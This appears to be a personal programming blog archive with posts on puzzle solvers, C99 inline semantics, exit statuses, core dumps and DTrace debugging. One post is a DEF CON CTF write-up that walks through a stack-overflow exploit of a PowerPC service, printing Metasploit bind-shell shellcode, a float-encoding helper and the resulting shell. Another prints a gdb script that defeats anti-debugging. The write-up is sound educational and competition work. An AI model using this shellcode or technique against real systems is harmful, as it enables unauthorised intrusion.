Programming – The Spoony Blog

Polyomino puzzle solver

adam — Tue, 01 Jan 2013 22:52:14 +0000

Last year’s MIT Mystery Hunt had a fun puzzle called Caterpillars which involved fitting together a bunch of polyomino pieces (laser cut by the fine folks at danger!awesome, by the way). So naturally I decided to write a program to solve it, and I was successful in that endeavor.

After the Hunt ended, I cleaned up the program, polished it up, and generalized it as much as possible. The goal was to have a general-purpose polyomino solver that could solve as many different possible puzzles. Another solver existed at the time, but it did not have any source code available so could not be modified to solve more general puzzles. Although apparently at least one new open-source solver has appeared in between then and now.

Without further ado, my polyomino solver can be found here on my GitHub, source code and all. Usage instructions can be found in the accompanying readme file.

It’s not super-efficient, but it was good enough to solve Caterpillars. If I ever get motivated enough (read: another appropriate Mystery Hunt puzzle comes along), I’ll re-architect and optimize it, but I currently have no immediate plans to do so.

Debugging a strange iTunes permissions problem with DTrace

adam — Sun, 27 Nov 2011 21:07:16 +0000

The other day, I noticed that one of my media files wouldn’t play in iTunes because it decided that my computer wasn’t authorized to play it. I could not authorize my computer to play that song, however, because the iTunes account name associated with that song no longer existed—I had changed the email address of my account in between the time that that was purchased and when I transferred it to my current computer (it was purchased prior to iTunes’ releasing all of their music DRM-free; I strongly oppose DRM).

When I attempted to re-download the track from the iTunes Store, it gave me this error message which would ordinarily be pretty helpful:

iTunes couldn’t download your purchase.

You don’t have write access for your iTunes Media folder or a folder within it. Change permissions (in the Finder) and then choose Store > Check for Available Downloads

Alas, that was not the problem. Nothing I can think of would have messed up the permissions, and find(1) confirms that all of the subdirectories there are owned by me and are readable, writable, and executable:

$ cd ~/Music/iTunes
$ find . \! -user $USER
$ find . -type d \! -perm -0700
$ # No output from the above commands

What’s going on here?

Time to dig deeper with DTrace. DTrace is a powerful debugging tool, useful for answering such questions as “What system calls is this process calling?”, “Why is the performance of my server so horrendous?” and many more. It’s like strace on crack.

But with great power comes great complexity. In order to use DTrace, you need write a short program in the tool’s D programming language (not to be confused with that other D programming language). The program can be written on the command line or in a separate text file, but it’s still non-trivial. Some really useful examples can be found here, in addition to the various examples in the documentation.

The error message from iTunes strongly smells like a call to open(2) is failing with EACCES when iTunes tries to create the re-downloaded media file. Let’s see if that’s the case:

syscall::open*:entry
/pid == $target/
{
  printf("%s %s 0x%x 0x%x", execname, copyinstr(arg0), arg1, arg2);
}

syscall::open*:return
/pid == $target/
{
  printf("errno=%d", errno);
}

Get the PID of iTunes, start tracing it with sudo dtrace -s open.d -p $PID, and try to download the file again. Unfortunately the output is not expected—errors like this get printed many times:

dtrace: error on enabled probe ID 6 (ID 120: syscall::open:return):
 invalid user access in action #2 at DIF offset 24

After a little more digging, I discovered that iTunes does not like getting debugged, which probably means it also doesn’t like getting itself traced—it just makes the debugger segfault instead. Fortunately, it’s not too hard to get around this: just turn ptrace into a no-op in iTunes when it tries to make itself undebuggable with ptrace(PT_DENY_ATTACH). Charlie Miller provides a nice gdb script for doing so:

break ptrace
condition 1 *((unsigned int *) ($esp + 4)) == 0x1f
commands 1
return
c
end

Ok, so we’re past that hurdle. Quit iTunes, restart it under gdb with this anti-anti-debugging technique, fire up DTrace again, and try to re-download the file:

CPU     ID                    FUNCTION:NAME
  0    119                       open:entry iTunes /.vol/234881026/1516872/SC Info.sidb 0xa00 0x1b6
  0    120                      open:return errno=13

Hmm. Error 13 is indeed EACCES, but what is this strange file under /.vol? Why, it’s the Volume Management file system, used by the Carbon File Manager. Using ls -al /.vol, it appears that that directory is completely empty, yet somehow other file accesses within there succeeded, as indicated in the DTrace output.

I’m not sure if there’s an easy to figure out which directory in the real file system that /.vol/234881026/1516872 refers to, but a quick search for a file named “SC Info” yields two likely candidates:

$ locate -i "SC Info"
/Users/Shared/SC Info
/Users/Shared/SC Info~orig

Let’s see what those directories look like:

$ ls -la /Users/Shared/SC\ Info*
/Users/Shared/SC Info:
total 0
drwxr-xr-x   2 root  wheel   68 Jul  2  2010 .
drwxrwxrwt  10 root  wheel  340 Oct 30 22:54 ..

/Users/Shared/SC Info~orig:
total 0
drwxrwxrwx   2 adam  wheel   68 Jul  2  2010 .
drwxrwxrwt  10 root  wheel  340 Oct 30 22:54 ..

Aha! So iTunes is trying to create a file named SC Info.sidb in /Users/Shared/SC Info, but it’s failing because I don’t have write access to that directory.

The solution:

sudo chmod a+w /Users/Shared/SC\ Info

Bingo! The song now downloads successfully.

Of course, you probably could have skipped all this, googled the error message, and found this knowledge base article explaining how to fix it without too much trouble, but that’s boring. Using DTrace to debug the problem is much more fun and exciting!

Do you have any great success (or failure) stories involving DTrace?

Algebraic Crosswords

adam — Sun, 24 Apr 2011 05:59:42 +0000

A blogger by the name of T Campbell recently posted an interesting read about Algebraic Crosswords. And at the end, T posts a $100 bounty for a computer program to help crossword constructors construct such crosswords. That’s right up my alley as both a programmer and a puzzle solver, so I threw together a quick Python script to do the job.

My program, named algxword, can be downloaded from my GitHub.

The usage is as follows:

Usage: ./algxword.py [OPTIONS...] WORDLIST FROM TO

Finds all words in the file WORDLIST (which need not be sorted) which would
continue to be words when substituting the substring FROM for the substring TO.
Only words which contain FROM in them are considered.

Both FROM and TO can be empty strings.  If FROM is the empty string, then TO is
added at each position in the string to test for a word.  If TO is the empty
string, then the FROM string is simply deleted.

Ordinarily, only the first occurrence of FROM is replaced with TO.  If the -a
option is specified, then all occurrences of FROM are replaced with TO.

OPTIONS:

-a      Replaces all occurrences of FROM with TO when testing for a word
--help  Prints this help message

Examples:

# Find all words which remain words when substituting the first occurrence of
# 'qu' for 'k' in the word list /usr/share/dict/words
python algxword.py /usr/share/dict/words qu k

# Same as above, but replace all occurrences of 'qu' for 'k'
python algxword.py -a /usr/share/dict/words qu k

# Find all words which can have an 'lax' inserted in them
python algxword.py /usr/share/dict/words "" lax

More detailed instructions for the less command line-savvy can be found in the included README file.

UPDATE 2013-01-01:

The download location has been moved to GitHub. I also relicensed it under a BSD-like license instead of the GNU GPL.

The tricky inline specifier in C99

adam — Mon, 21 Mar 2011 04:04:18 +0000

Try to compile the following simple C program in C99 mode with GCC:

inline void foo() {}
int main(void)
{
  foo();
}

The results may surprise you:

$ gcc test.c -std=c99
/tmp/ccWN4GRh.o: In function `main':
test.c:(.text+0xa): undefined reference to `foo'
collect2: ld returned 1 exit status

Huh? The function’s right there!

Well it turns out that this is not a bug in GCC, but a peculiarity in the way the inline keyword is defined by the C99 standard. Basically, a function declared inline without either of the extern or static linkage specifiers only creates an inline definition of that function, not an external definition.

When presented with a call to such a function, the compiler can choose to call either the inline definition or the external definition. If it chooses the external definition, and such an external definition doesn’t exist, we get a linker error, as in the above example. In the dry words of the standard:

ISO/IEC 9899:1999 §6.7.4/6:

Any function with internal linkage can be an inline function. For a function with external linkage, the following restrictions apply: If a function is declared with an inline function specifier, then it shall also be defined in the same translation unit. If all of the file scope declarations for a function in a translation unit include the inline function specifier without extern, then the definition in that translation unit is an inline definition. An inline definition does not provide an external definition for the function, and does not forbid an external definition in another translation unit. An inline definition provides an alternative to an external definition, which a translator may use to implement any call to the function in the same translation unit. It is unspecified whether a call to the function uses the inline definition or the external definition.¹²⁰⁾

So there are three ways to fix this code:

Give foo internal linkage (by declaring it static) and avoid the above clause entirely
Declare foo as extern
Provide a separate external definition for foo in another translation unit (that is, another source file)

I would strongly recommend against solution #3, since then your code base will have two separate definitions of foo, which will be very confusing for people reading your code. It’s very easy for them to get out of sync, if somebody changes one definition but forgets to change the other, which makes for some insidious bugs (such as working correctly in a debug build but not in a release build, or vice-versa).

If your inline function is defined and used only in one source file (as in our toy example), solution #1 is the way to go: just give it internal linkage. No reason to make it world-accessible.

Conversely, if your inline function is defined in a header file so it can be used throughout your code, it makes more sense to give it external linkage. Go with solution #2:

extern inline void foo() { /* body */ }

The Unkillable Window

adam — Wed, 08 Sep 2010 05:56:36 +0000

I recently ran into a very strange occurrence on my Windows box: an unkillable window. I was rebooting after installing some software that required a reboot (*sigh*) and noticed that the restart didn’t quite happen—most of my processes were killed, but there was this leftover window that wouldn’t go away. Further attempts to reboot did not result in any obvious effect, and the window refused to be closed by any normal method (though it happily moved around).

I also couldn’t start any new processes (such as a debugger); Windows wouldn’t let me because the system was shutting down. Oof. Fortunately, I did have a copy of Process Explorer already running. Process Explorer has a nifty tool where you can drag this icon (the circle-cross icon adjacent to the binoculars) onto any window, and it will tell you what process that window belongs to. I assume it uses GetWindowThreadProcessId(). However, doing this gave a curious error, something like “this window does not belong to any process”; I forget the exact wording since I didn’t write it down.

At this point, I was ready to pull the plug, but I decided to try one more thing—I started killing processes willy-nilly. When I killed services.exe, Windows got kinda upset and told me that it would be shutting down in 60 seconds because a critical process was killed, which was perfectly fine with me. But 60 seconds passed by, and Windows still did not shut down. I then killed winlogon.exe, which promptly BSOD‘ed me.

I don’t remember exactly what I did to create the unkillable window, but it went something like this: I was simultaneously debugging two copies of a particular executable, one with Visual Studio 2008 and one with WinDbg. I also at one point set the Image File Execution Options debugger key for that executable to point to vsjitdebugger.exe, and I may have deleted that registry key during my debugging sessions. The unkillable window was the console window from the debuggee of one of those debugging sessions (not sure which), and it somehow persisted after killing the debugger.

Does anyone have any ideas on what exactly can cause such an unkillable window not owned by any process to appear? And if it does appear, how can it be killed without hard rebooting? It’s too bad Raymond Chen‘s suggestion box is closed, otherwise this would be going right in there. Raymond, if you’re out there, your input would have greatly appreciated on this matter.

Kakuro Solver

adam — Thu, 01 Jul 2010 05:18:06 +0000

Kakuro (also known as Cross Sums) is a popular number-based logic puzzle. It resembles crossword puzzles, except instead of clues made up of words, you have clues made up of numbers indicating the sum of the digits in the indicated cells, with the additional constraint that no entry contain the same digit more than once.

The MIT Mystery Hunt is no stranger to Kakuros. It has featured a number of Kakuro variants over the years, most of which often involve some special trick or gimmick not present in a standard Kakuro puzzle. Of course, figuring that out is part of the puzzle.

The 2009 Hunt featured an intriguing puzzle named Cross Something-Or-Others, by Thomas Snyder and Dan Katz. It had 8 different Kakuro variants (Nonsense Kakuro does not count). After the Hunt was over, I decided to write a generic, optimized Kakuro solver that could solve all of these variants for help with future Hunts. Although I did not get to use my solver during the 2010 Hunt (I missed whatever Kakuros there were, if there were any at all), I hope this will be useful for puzzle solvers present and future.

There are many other solvers out there (and more), but none of them were adequate enough for me. They all had various issues: some had no source code (making solving variants impossible), they had a horrendous interface for inputting puzzles, they weren’t portable enough, or they were too slow.

Actually, I probably could have gone with zvrba’s solver and modified it, but I decided to start from scratch anyways. “There are many like it, but this one is mine”, as the saying goes.

So anyways, back to my solver. I wrote it from the ground up to be blazing fast. It stores the set of possible values a cell can have using a bit set, and it uses some inline assembly (specifically the x86’s BSF and BSR instructions). So, it’s not completely portable out-of-the-box, but those can be replaced easily enough with generic C routines that will be slower, or the equivalent instructions on other ISAs. It also uses the pthreads library for multithreading. If you want to compile it for a platform that does not support pthreads (such as Windows), you can either replace pthreads with your platform’s equivalent, or nuke the threading support entirely. But other than those two things, the program is completely portable C.

Secondly, I also designed the solver to be as generic as possible, in order to be able to solve (or be modified to solve) as many different Kakuro variants as possible. The most flexible piece is the set of allowable numbers in a cell. In standard Kakuro, that set of numbers is 1–9. Common variants include allowing 0, or changing the base to make something like hexadecimal Kakuro (1–15). My solver allows any subset of the numbers 0–30; it could easily be modified to use a subset of 0–63, but I haven’t bothered with that yet, since extending that support might slow it down a little (probably not very much though) on 32-bit machines, and I’ve never seen a puzzle that uses cells with numbers that large.

I also coded up modifications to solve most of the variants in the puzzles linked to above. Again, for maximal speed, the logic in these variants is controlled by various #defines, producing separate binaries for each of them.

So how does it work? Under the hood, it’s got one simple rule, followed by a brute-force search. That one rule is:

The minimum possible value for a cell is given by the total sum of the numbers in the entry (the clue) minus the sum of the maximum possible values of all of the other cells in the entry
The maximum possible value for a cell is given by the total sum minus the sum of the minimum possible values of all of the other cells in the entry

It turns out that this is often all you need, especially for simple puzzles. This does not try to enumerate all possible sets of values for an entry—in other words, for a 2-cell clue with a sum of 4, it does not deduce that 2 is not a possible value for either cell. It only determines that 1–3 are legal values, since that is 4 (the sum) minus 1 (the minimum value for the other cell).

It also performs other logic which I consider so obvious that it shouldn’t need stating, but here it is anyways: if a cell can only contain one number, then all other cells in the two entries that go through that cell cannot take on that value.

It repeats this logic for every cell for every clue in both the across and down directions as long as it continues to make progress by eliminating numbers as possible values for cells. If you’re lucky, it might solve the entire puzzle this way (this is very fast). If you’re not so lucky, it starts a brute-force depth-first search of the entire remaining puzzle space and attempts to enumerate all possible solutions.

The brute-force search isn’t a dumb search, though. It picks one cell, iterates through all possible allowed values for that cell, and recurses. The cell that it picks is one that belongs to the entry that has the fewest possible total values, which is computed as the product of the number of values of each cell in that entry; once the entry is determined, the first cell with more than one possible value is used. The idea here is that for incorrect guesses (which most are), we want to reach a contradiction as quickly as possible, which we try to do by picking an entry with a small number of possibilities. In my tests, this usually seems to give vastly better results, but not always, when compared to just picking the first cell that can have multiple values.

Ok, enough with the discussion, you’ve been patient enough. You can download my Kakuro solver’s source code here. It’s licensed under the GPL version 3 or later. Comments are most welcome!

I’ll take Pwtent Pwnables for 400 please, Alex

adam — Thu, 27 May 2010 03:11:21 +0000

This past weekend, I participated in my first ever DEF CON Capture the Flag Qualifying Tournament. CTF is a contest at the aforementioned annual hacker conference where the goal is to keep your team’s network services (which are on a closed intranet) up and running for as much as possible, while simultaneously trying to bring down your opponents’ network services. The qualifying tournament is an open tournament to determine the special few who will get to play CTF.

The categories in this year’s quals were Persuits Trivial, Crypto Badness, Packet Madness, Binary L33tness, Pwtent Pwnables, and Forensics, laid out in a Jeopardy!-style grid. There were 5 challenges in each category, worth 100 through 500 points respectively. I spent a fair amount of time working on Pwtent Pwnables (note that this contest was a team contest), and though I didn’t solve it during the contest, I managed to get a working exploit after the contest ended. Here’s a writeup of my work.

For this problem, you’re given this file and told that it’s running on pwnie.ddtek.biz. Go.

A quick file(1) says that this is a Mach-O executable ppc. strings(1) suggests that it’s binding to a port and listening on a socket. It receives some floating-point numbers, computes the average and standard deviation of those numbers, and sends the results back. The text includes “max of 16”, suggesting an obvious buffer overflow attack.

Let’s take a look at the disassembly and see what we can figure out. Fire up objdump, part of the binutils distribution:

$ objdump -d pp400_8c9d628d2144bbe8b.bin -s > pp400.s

Hmm. Not a lot to work with here. No symbols, and the convoluted dynamic linking makes it extremely difficult to even see what the calls to dynamically linked functions are. Here’s what the stub for calling fork(2) looks like:

    3d80:   7c 08 02 a6     mflr    r0
    3d84:   42 9f 00 05     bcl-    20,4*cr7+so,3d88 
    3d88:   7d 68 02 a6     mflr    r11
    3d8c:   3d 6b 00 00     addis   r11,r11,0
    3d90:   7c 08 03 a6     mtlr    r0
    3d94:   85 8b 03 18     lwzu    r12,792(r11)
    3d98:   7d 89 03 a6     mtctr   r12
    3d9c:   4e 80 04 20     bctr

Can you tell that’s a fork? I sure can’t. The bcl grabs the current instruction address (0x3d88), and then after some bookkeeping, the value at address 0x3d88+0x792 is loaded and then branched to. The memory at 0x40a0 is in the data segment in a stream of .long 0x2428, which presumably get replaced at load time with the actual addresses of the dynamically linked functions. How exactly that works, though, is still a mystery to me.

Disassembling it isn’t all that helpful right now, so maybe we can try running it to figure out what it does. I don’t have a PowerPC Mac, but thanks to Rosetta, I can run the program seamlessly on my x86 Mac:

$ chmod a+x pp400_8c9d628d2144bbe8b.bin
$ ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted

Well drat. It looks like it’s trying to drop privileges (a standard procedure to minimize risk in socket-based applications), but it’s failing somehow. What’s it trying to do? Let’s see with ktrace (aside: DTrace is far superior to ktrace but only available on OS X v10.5 and up; if you’re still running 10.4 like I am, then ktrace is your best option).

$ ktrace ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted
$ kdump | less

Looking through the log, we see calls to socket(2), setsockopt(2), bind(2), and listen(2), a standard sequence for a simple server. The problem failure here is coming from a call to setgroups(2) and setgid():

  8972 pp400_8c9d628d21 CALL  setgroups(0x1,0xb7fff958)
  8972 pp400_8c9d628d21 RET   setgroups -1 errno 1 Operation not permitted
  8972 pp400_8c9d628d21 CALL  setgid(0x1f8)
  8972 pp400_8c9d628d21 RET   setgid -1 errno 1 Operation not permitted

Well hmph, I’m stumped. The man pages here (and yes I realize I’m mixing links to the Linux and OS X man pages; it doesn’t really matter, they say mostly the same things since this is all POSIX) say that setgroups() will only succeed if run as root, and setgid() can only do trivial things as non-root. I’m definitely not going to run this as root, and the contest server sure as hell won’t be running as root.

At this point, I cheated (sort of). I noticed that this program was doing essentially the same things as an earlier problem in the contest, namely pp100. That problem was a program which also ran a server of sorts, but it was an ELF for FreeBSD. The difference there was that it included some sort of symbols in it, so disassembling it was incredibly helpful: there were useful function names, and it was obvious which system calls were being made and where. And in that program, I noticed that it was grabbing a username (digger) out of the data segment and calling drop_privs_user() with that username.

Armed with that knowledge and taking another look at the data segment of pp400, we see the string “luser” near the beginning. That looks promising. So, create a new user on your Mac named luser and try again.

Nope, same error. Maybe if we try running the program as luser?

$ su luser
Password:
$ ./pp400_8c9d628d2144bbe8b.bin

Success! It’s now listening on a socket. But on what port? lsof(8) to the rescue!

lsof -i  # Must be run as luser (or as root)
COMMAND    PID  USER   FD   TYPE    DEVICE SIZE/OFF NODE NAME
pp400_8c9 9254 luser    4u  IPv4 0x689bc9c      0t0  TCP *:nettest (LISTEN)

It’s listening on the nettest port; if we grep for that in /etc/services, we find that that corresponds to port 4138. So let’s try that out:

telnet localhost 4138
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Send me some floats (max of 16), I will tell you some stats!
1 2 3^D
The average of your 3 numbers is 2.000000
The standard deviation of your 3 numbers is 0.816497
Connection closed by foreign host.

It took a bit of experimentation, but I eventually figured out that the server didn’t compute and return results unless you sent a literal ^D (EOF) character. Let’s send a gazillion numbers and see what happens:

$ python -c 'print " ".join(map(str, range(10000))), "\4"' | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
$

Yep, it crashed all right. Now let’s exploit it. The first step is figuring out where in memory the buffer of floats is being stored. Normally we could just attach a debugger and figure it out, but debugging a process running Rosetta is not trivial. Fortunately, it is possible—a little googling leads one to this blog post and the Universal Binary Programming Guidelines, which detail the procedure. Run the binary with the OAH_GDB environment variable set, and then in another shell, run gdb --oah, attach to the process, and continue:

# First shell
$ OAH_GDB=YES ./pp400_8c9d628d2144bbe8b.bin
Starting Unix GDB Session
Listening

# Second shell (must be luser or root)
$ gdb --oah
(gdb) attach pp400_8c9d628d21.9453
(gdb) c

Unfortunately, it seems that the follow-fork-mode option for GDB does not work on OS X, so if you attempt to set it, you’ll find that you’re still attached to the parent process regardless of its setting. But fortunately, if the child process crashes, gdb still manages to halt when the crash occurs and inspect the program state. Run the earlier Python one-liner to crash the child process:

Program received signal SIGSEGV, Segmentation fault.
0x000033f8 in ?? ()
(gdb) disas $pc-20 $pc+20
Dump of assembler code from 0x33e4 to 0x340c:
0x000033e4:     lfs     f0,128(r30)
0x000033e8:     rlwinm  r2,r0,2,0,29
0x000033ec:     addi    r0,r30,56
0x000033f0:     add     r2,r2,r0
0x000033f4:     addi    r2,r2,8
0x000033f8:     stfs    f0,0(r2)
0x000033fc:     lwz     r2,60(r30)
0x00003400:     addi    r0,r2,1
0x00003404:     stw     r0,60(r30)
0x00003408:     addi    r0,r30,128
End of assembler dump.
(gdb) p/x $r2
$1 = 0xc0000000
(gdb) p/x $sp
$2 = 0xbffff400
(gdb) x/32x $r2-128
0xbfffff80:     0x44340000      0x44344000      0x44348000      0x4434c000
0xbfffff90:     0x44350000      0x44354000      0x44358000      0x4435c000
0xbfffffa0:     0x44360000      0x44364000      0x44368000      0x4436c000
0xbfffffb0:     0x44370000      0x44374000      0x44378000      0x4437c000
0xbfffffc0:     0x44380000      0x44384000      0x44388000      0x4438c000
0xbfffffd0:     0x44390000      0x44394000      0x44398000      0x4439c000
0xbfffffe0:     0x443a0000      0x443a4000      0x443a8000      0x443ac000
0xbffffff0:     0x443b0000      0x443b4000      0x443b8000      0x443bc000

What happened here is we walked off the stack: we just kept copying into the stack buffer all the way up the stack, which started at 0xbffffffc. We can clearly see the increasing set of floating-point numbers filling the end of the stack. Using this handy dandy IEEE 754 calculator, we see that 0x44340000 is the float 720, which means the buffer started at 0xbfffff80 – 720*4 = 0xbffff440, which at this point is $sp+0x40.

To exploit this now, we need to put our payload on the stack and then overwrite a return address with the proper stack address so we jump into the payload. We also can’t write more than about 751 numbers, since we’d crash before we got to the payload as we did just here, but fortunately this isn’t a problem.

Now let’s figure out in the payload the stack address needs to go. Restart the server, reattach gdb, and rerun the Python one-liner with only 100 numbers instead of 10000. The result:

Program received signal SIGSEGV, Segmentation fault.
0x41d00000 in ?? ()

The program counter ended up at 0x41d00000, which is the float 26. So, we need to place our pointer into the payload in the 27th number; the first 26 can be anything.

For the payload itself, start with the osx/ppc/shell_bind_tcp payload from Metasploit:

$ msfconsole
msf > use osx/ppc/shell_bind_tcp
msf payload(shell_bind_tcp) > generate -t c
/*
 * osx/ppc/shell_bind_tcp - 224 bytes
 * http://www.metasploit.com
 * AutoRunScript=, AppendExit=false, PrependSetresuid=false, 
 * InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, 
 * RHOST=, PrependSetreuid=false
 */
unsigned char buf[] = 
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";

We can’t just send the payload as-is, though. We have to send it as floats which then get sscanf’ed into the raw binary. So we need to take the payload, group it into 4-byte units, convert those to floats, and print those out as strings, being careful that the resulting strings reconvert back properly. PowerPC instructions are fixed at 4 bytes, which is convenient in this case. I did that with this little C snippet:

void emit(unsigned int op)
{
  char buf[256];

  union
  {
    unsigned int op;
    float f;
  } u;

  float g;

  u.op = op;
  sprintf(buf, "%64.64f", u.f);
  if(sscanf(buf, "%f", &g) != 1 || g != u.f)
    printf("***BAD*** 0x%08x (%s)\n", u.op, buf);
  else
    printf("%s\n", buf);
}

Trying it out, we see a couple of the opcodes from the payload don’t encode properly: 7fc3f378 (mr r3,r30) and 7fe00008 (trap). Why? Well, these correspond to encodings of NaN. If you try and sscanf back the string “nan”, you’re not going to get those values back.

Time to bust out the Power ISA. Let’s find some instructions we can replace those with that encode properly. We want to avoid any instruction that begins with the bits 011111111 or 111111111. After some perusing through the opcode maps, I found that “addi r3,r30,0”, encoded as 387e0000, would be a suitable replacement for “mr r3,30”, and “twi 15,r0,0”, encoded as 0de00000, would be a suitable replacement for “trap”. The trap instruction isn’t actually necessary, it’s just a safety in case the system call to exec() to execute the shell fails, but I decided to replace it anyways.

Throw in a standard nop sled, and we’re done! Here’s the final exploit code. Run as:

$ ./pp400-exploit | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
The average of your 148 numbers is inf
The standard deviation of your 148 numbers is inf

# Open up a new shell and connect to the bind shell
nc localhost 4444
id
uid=504(luser) gid=504(luser) groups=504(luser)
pwd
/Users/luser

Huzzah! We have a bind shell!

Now I mentioned earlier that I didn’t get around to solving this during the contest, so I don’t know if this exploit would have worked against the target machine. I do know, however, that since the PowerPC exploit worked flawlessly on my x86 Mac, it wouldn’t have mattered whether the target machine was actually PPC or x86 (though I did have to tweak the length of the nop sled and the buffer address to jump to until it worked, since the program has different behavior when running under the debugger and when not). Props to Rosetta for correctly translating code generated at runtime.

And that, my friends, is an anatomy of an exploit.

You could have done all that, or you could have realized that this problem was identical to pp400 from last year. I of course didn’t realize this since I didn’t compete last year, but one of my teammates pointed this out to me (yet somehow I lost the motivation to keep working on this problem…). That unofficial writeup to which I just linked was taken down during the contest, presumably because the writers were competing again and didn’t want to give other teams an advantage, though my teammate had a copy of the text. In any case, I still had fun solving this.

One more note about exit statuses

adam — Thu, 20 May 2010 01:14:41 +0000

Last week, I mentioned in passing that Windows allows the full range of 32-bit exit codes. That’s true, but only if you directly call ExitProcess() (or its less-friendly kin TerminateProcess()).

If you just call exit() (or return from main(), which implicitly calls exit()), then like in the *NIX world, you only get the bottom 8 bits of the exit status—see MSDN’s exit() documentation. So for portability’s sake, don’t use exit statuses above 255 unless you really, really need to.

So what’s in an exit status anyways?

adam — Thu, 13 May 2010 05:02:27 +0000

Last time, we saw how we can capture a process’ core dump. The astute reader will have noticed that we seem to be pulling bits out of thin air:

int status;
if(wait(&status) < 0)
  perror("wait");
if(WIFSIGNALED(status) && WCOREDUMP(status))
...

We’ve got a 32-bit exit status, and yet we seem to getting two more useful bits of information out of it from the WIFSIGNALED() and WCOREDUMP() macros. How is that possible?

Well, what you thought was a 32-bit exit status really isn’t 32 bits. In fact, it’s quite a bit less than. The C standard only guarantees one useful bit. Quoth section 7.20.4.3, paragraph 5, of the C99 standard, which describes the exit(3) function:

Finally, control is returned to the host environment. If the value of status is zero or EXIT_SUCCESS, an implementation-defined form of the status successful termination is returned. If the value of status is EXIT_FAILURE, an implementation-defined form of the status unsuccessful termination is returned. Otherwise the status returned is implementation-defined.

Recall that implementation-defined means the C standard doesn’t define what happens, but the implementation (in this case, the GNU C library, or the Microsoft C library, etc.) must document the decision it made. Contrast this with undefined behavior, in which anything could happen (including erasing your hard drive), and nowhere does what happens have to be documented.

So if you want to write portable code, you only get one bit of information in your exit status: successful or unsuccessful termination, which is often good enough for most applications. If you go this route, it’s a good idea to use the EXIT_SUCCESS and EXIT_FAILURE macros, but it’s by no means necessary. You can use still use 0 and something non-0 (1 is a popular—and good—choice), and it will still work pretty much anywhere if you’re not unlucky. But the only truly 100% portable unsuccessful status is EXIT_FAILURE.

Screw that. You want more than one bit of information in your exit status. There’s a whole 32 bits (or occasionally 16 or 64 on some non-standard systems) in an int, so why can’t we use them? On Linux, the exit(3) man page clearly states we get 8 bits:

The exit() function causes normal process termination and the value of status & 0377 is returned to the parent (see wait(2)).

Mac OS X likewise also provides 8 bits (though that fact is a little more subtle in the documentation there). Windows fares better here—it provides the full 32 bits via the GetExitCodeProcess() function here—but the discussion here is going to focus on Linux/Mac OS X for now.

8 bits. Much more useful than 1, though not quite the 32 you might have been hoping for. It’s enough to express a varied gamut of exit statuses (incorrect usage, file not found, other unexpected error, etc.).

A consequence of this behavior is if you exit with a status that is a multiple of 256, that’s indistinguishable from 0, which means you’re likely exiting with a successful status when you meant it to be unsuccessful. Oops.

As a quick example, try out these shell commands ($? is a special parameter that evaluates to the exit status of the last child process or pipeline ran by the shell):

$ bash -c 'exit 5'; echo $?     # Prints 5
$ bash -c 'exit 256'; echo $?   # Prints 0 (!)

Now that we’ve figured out we only have 8 bits that come with an exit status, it’s clear how the WIFSIGNALED() and WCOREDUMP() macros work: wait(2) stuffs extra information into the status in addition to the child process’ exit status (you could have figured that out by reading the man page, but you obviously didn’t since you’re here reading this).

One final word of caution: be careful about exit statuses above 128. When a process is terminated due to a signal (say, because it segfaulted, resulting in a SIGSEGV), the exit status is 128 plus the signal number. Yes, a parent process can tell if the child process was terminated by a signal or by calling exit() by checking with WIFSIGNALED(), but it’s not always possible to get at that information when you want it. If you’re executing commands in the bash shell, you can get at the exit status quite easily with $?, but you can’t get at the other bits returned by wait(), at least not in any way I know. To keep things simple, if you never use exit statuses above 128, then anyone can unambiguously determine that an exit status of 0–127 means a normal exit, and an exit status of 128–255 means an abnormal exit.

In summary, use only EXIT_SUCCESS and EXIT_FAILURE for maximally portable code, and otherwise use only 0–127 for code that will be portable to Linux, Mac OS X, and Windows (and probably other not-uncommon systems that are still in current us but with which I’m not familiar enough to comment on).

Dumping core

adam — Sat, 24 Apr 2010 00:52:30 +0000

Your program just crashed, and you didn’t have a debugger attached. You can’t reproduce the crash after many attempt. How you do debug the problem?

Well, if your program had left a core dump, you could easily attach a debugger postmortem and get some kind of idea what state the program was in before it died. A core dump is essentially a dump of all memory in your program’s virtual address space: stack, heap, code and everything else.

On most systems, though, you won’t get a core dump when you crash, where a crash can come from a segfault (or any other signal), a call to abort(2) (such as via a failed assertion), a call to terminate() (such as via throwing an uncaught exception), or other similar avenues. Core dumps are rather large (after all, it’s all of the memory from the process) — they can easily be tens or hundreds of megabytes, even for simple programs, due to a large number of shared libraries being loaded. Your hard drive would fill up very quickly if every program that crashed left a core dump.

